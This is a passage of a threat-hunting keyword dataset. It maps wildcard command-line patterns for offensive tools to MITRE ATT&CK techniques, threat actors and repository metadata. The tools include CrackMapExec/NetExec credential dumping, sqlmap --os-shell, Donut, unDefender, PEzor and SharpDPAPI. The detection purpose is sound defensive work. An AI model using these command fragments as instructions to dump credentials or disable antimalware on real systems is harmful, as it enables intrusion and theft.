CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -u * -p * -M handlekatz*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* -u * -p * -M nanodump*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* -u * -p * -M ntdsutil*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* -u * -p * --sam,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -u * -p * --shares*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -u * -p *--pass-pol*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -u *http* --dbs,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* -u *http* --os-shell*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* -u FUZZ *,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* -u http* -f *.dll * -p *,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -* -U msf -P msf *,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. 
Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,0,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -* -u wordlist * wordlist_uniq_sorted*,offensive_tool_keyword,wordlists,Various wordlists FR & EN - Cracking French passwords,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/clem9669/wordlists,1,0,N/A,N/A,2,191,44,2023-10-03T14:28:50Z,2020-10-21T14:37:53Z -* uberfile.py *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* ubiquiti-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --unconstrained-users*,offensive_tool_keyword,windapsearch,Python script to enumerate users - groups and computers from a Windows domain through LDAP queries,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/ropnop/windapsearch,1,0,N/A,N/A,7,666,134,2022-04-20T07:40:42Z,2016-08-10T21:43:30Z -* unDefender.exe*,offensive_tool_keyword,unDefender,Killing your preferred antimalware by abusing native symbolic links and NT paths.,T1562.001 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/APTortellini/unDefender,1,0,N/A,10,4,309,78,2022-01-29T12:35:31Z,2021-08-21T14:45:39Z -* -unhook -antidebug * -self -sleep*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* -unhook -syscalls -obfuscate *,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* --unhook-method * --dont-unload-driver * --dump-output *,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -* unicorn.py*,offensive_tool_keyword,unicorn,Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory,T1059.001 - T1055.012 - T1027.002 - T1547.009,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation 
tools,https://github.com/trustedsec/unicorn,1,0,N/A,N/A,10,3503,839,2023-09-15T05:43:27Z,2013-06-19T08:38:06Z -* --union-char *GsFRts2*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* unittest.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* unusual-port.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* upnp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* uptime-agent-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -UrbanBishop -Command *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* --url * --attacker *,offensive_tool_keyword,POC,VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887),T1068 - T1190.001 - T1210.002 - T1059.001 - T1059.003 - T1190 - T1569.002,TA0005 - TA0002 - TA0001 - TA0040 - TA0043,N/A,N/A,Exploitation tools,https://github.com/sinsinology/CVE-2023-20887,1,0,N/A,N/A,3,219,44,2023-06-13T14:39:17Z,2023-06-13T13:17:23Z -* --url --password SIMPLEPASS*,offensive_tool_keyword,IIS-Raid,A native backdoor module for Microsoft IIS,T1505.003 - T1059.001 - T1071.001,TA0002 - TA0011,N/A,N/A,C2,https://github.com/0x09AL/IIS-Raid,1,0,N/A,10,10,510,127,2020-07-03T13:31:42Z,2020-02-17T16:28:10Z -* -urlcache */debase64/*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* url-snarf.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* Use-DarkHotel*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -* -user * --passwordlist *,offensive_tool_keyword,adfspray,Python3 tool to perform password spraying against Microsoft Online service using various methods,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/xFreed0m/ADFSpray,1,0,N/A,N/A,1,75,14,2023-03-12T00:21:34Z,2020-04-23T08:56:51Z -* userenum * --dc *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -Username * -Hash * -Command *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-SMBExec.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -Username * -Password * -Command * -LogonType *,offensive_tool_keyword,RunasCs,RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential,T1055 - T1134.001,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs,1,0,N/A,N/A,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -* --UserName * --Password * --Payload *.exe*,offensive_tool_keyword,SplunkWhisperer2,Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations,T1068 - T1059.003 - T1071.001,TA0003 - TA0002 - TA0011,N/A,N/A,Lateral Movement - Privilege 
Escalation,https://github.com/cnotin/SplunkWhisperer2,1,0,N/A,9,3,239,53,2022-09-30T16:41:17Z,2019-02-24T18:05:51Z -* -UserPersistenceOption *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Persistence.psm1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* --user-spns*,offensive_tool_keyword,windapsearch,Python script to enumerate users - groups and computers from a Windows domain through LDAP queries,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD 
Enumeration,https://github.com/ropnop/windapsearch,1,0,N/A,N/A,7,666,134,2022-04-20T07:40:42Z,2016-08-10T21:43:30Z -* UUID_bypass.py*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,0,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -* -VaultElementPtr *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* vaults /target:* 
/pvk:*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -* ventrilo-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* versant-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* vmauthd-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* vmware-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* vnc-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* vnc-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* vnc-title.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* voldemort-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* vtam-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -vulnerable -stdout -hide-admins*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* vulners.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* vulscan.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation 